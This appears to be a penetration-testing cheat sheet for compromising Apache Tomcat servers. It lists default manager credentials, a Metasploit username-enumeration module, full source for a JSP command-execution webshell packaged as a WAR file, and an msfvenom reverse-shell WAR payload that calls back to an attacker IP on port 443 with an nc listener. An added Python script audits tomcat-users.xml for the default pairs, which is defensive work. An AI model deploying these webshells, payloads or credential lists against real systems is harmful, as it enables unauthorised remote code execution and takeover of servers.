Apache Tomcat Server

Start / Stop Tomcat

/usr/lib/apache-tomcat-9.0.12/bin/catalina.sh start
/usr/lib/apache-tomcat-9.0.12/bin/catalina.sh stop
# Copy files into /usr/lib/apache-tomcat-9.0.12/webapps/ROOT/
# Access them at http://127.0.0.1:8080/test.jsp

Admin console

Apache Tomcat/5.0.28

http://$IP:8080/admin/login.jsp

Username enumeration

For Tomcat versions older than 6, it’s possible to enumerate usernames with Metasploit:

use auxiliary/scanner/http/tomcat_enum

Default credentials

tomcat / s3cret
admin/password
admin/
admin/Password1
admin/password1
admin/admin
admin/tomcat
both/tomcat
manager/manager
role1/role1
role1/tomcat
role/changethis
root/Password1
root/changethis
root/password
root/password1
root/r00t
root/root
root/toor
tomcat/tomcat
tomcat/s3cret
tomcat/password1
tomcat/password
tomcat/
tomcat/admin
tomcat/changethis

Deploy WAR files

Tomcat uses WAR (Web Application Archive) files to deploy web apps via servlets. These files are similar to JAR files but contain everything the web app needs, such as JavaScript, CSS, etc.

Deploying a WAR file requires being authenticated to the manager application (http://x.x.x.x/manager).
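Since the manager only asks for a valid login, an account left on one of the default pairs listed above is enough to deploy code. The following added example (not part of the original page) audits a tomcat-users.xml for those pairs and for trivial passwords on manager/admin accounts; it assumes passwords are stored in plaintext, and the function name and sample file are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Default pairs listed on this page, "user/password" (empty password allowed).
DEFAULT_PAIRS = {tuple(p.split("/", 1)) for p in """
tomcat/s3cret admin/password admin/ admin/Password1 admin/password1 admin/admin
admin/tomcat both/tomcat manager/manager role1/role1 role1/tomcat role/changethis
root/Password1 root/changethis root/password root/password1 root/r00t root/root
root/toor tomcat/tomcat tomcat/password1 tomcat/password tomcat/ tomcat/admin
tomcat/changethis
""".split()}

# Roles that grant access to the manager / admin applications.
PRIVILEGED = {"manager", "admin", "manager-gui", "manager-script",
              "manager-jmx", "admin-gui", "admin-script"}


def audit_tomcat_users(xml_text):
    """Return (username, problem, privileged_roles) for every risky <user>."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "user":  # ignore the XML namespace
            continue
        user = el.get("username") or el.get("name") or ""
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        priv = sorted(roles & PRIVILEGED)
        if (user, pw) in DEFAULT_PAIRS:
            findings.append((user, "default credentials", priv))
        elif priv and (pw == "" or pw.lower() == user.lower()):
            findings.append((user, "trivial password on privileged account", priv))
    return findings


# Constructed sample file, not taken from a real server.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="ops" password="Xq7!constructed-strong-value" roles="manager-gui"/>
  <user username="role1" password="tomcat" roles="role1"/>
</tomcat-users>"""

if __name__ == "__main__":
    for user, problem, priv in audit_tomcat_users(SAMPLE):
        print(f"{user}: {problem}; privileged roles: {', '.join(priv) or 'none'}")
```

Any finding with a non-empty privileged-role list is an account that can reach the deploy function and should be removed or given a strong, unique password.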

Webshell

Install the JDK – needed for the “jar” command

sudo apt install default-jdk

Create WAR file for webshell

mkdir myprecious
cd myprecious
nano index.jsp

Do not use the code from /usr/share/webshells/jsp/cmdjsp.jsp; use the following instead:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>

jar -cvf ../myprecious.war *

Deploy WAR file

  • In Tomcat, under WAR file to deploy, click on Browse and select the WAR file.
  • Click on Deploy.
  • Access it at http://x.x.x.x/myprecious/index.jsp?cmd=whoami

Reverse shell

msfvenom -p java/shell_reverse_tcp LHOST=$KALI_IP LPORT=443 -f war > myprecious.war

  • In Tomcat, under WAR file to deploy, click on Browse and select the WAR file.
  • Click on Deploy.

sudo nc -lvnp 443

Access the reverse shell payload at http://x.x.x.x/myprecious.